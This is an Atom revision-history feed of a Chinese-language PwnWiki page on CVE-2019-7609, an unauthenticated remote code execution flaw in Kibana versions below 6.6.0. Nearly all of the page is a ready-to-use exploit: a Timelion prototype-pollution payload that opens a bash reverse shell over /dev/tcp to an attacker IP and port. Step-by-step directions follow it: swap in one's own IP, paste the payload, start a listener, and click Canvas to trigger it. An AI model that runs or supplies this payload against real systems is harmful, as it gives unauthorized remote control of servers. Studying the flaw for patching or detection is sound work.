https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2019-7609 kibana 未授權遠程代碼執行漏洞 - Revision history
2026-04-10T01:00:17Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1683&oldid=prev
Pwnwiki: Created page with "==影響版本== kibana<6.6.0 ==POC== 將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行..."
2021-04-15T06:50:06Z
<p>Created page with "==影響版本== kibana<6.6.0 ==POC== 將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行..."</p>
<p><b>New page</b></p><div>==影響版本==<br />
kibana<6.6.0<br />
<br />
==POC==<br />
將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行<br />
<pre><br />
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')<br />
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')<br />
</pre><br />
<br />
攻擊機器开启监听,点击 Canvas 即可觸發漏洞。</div>
Pwnwiki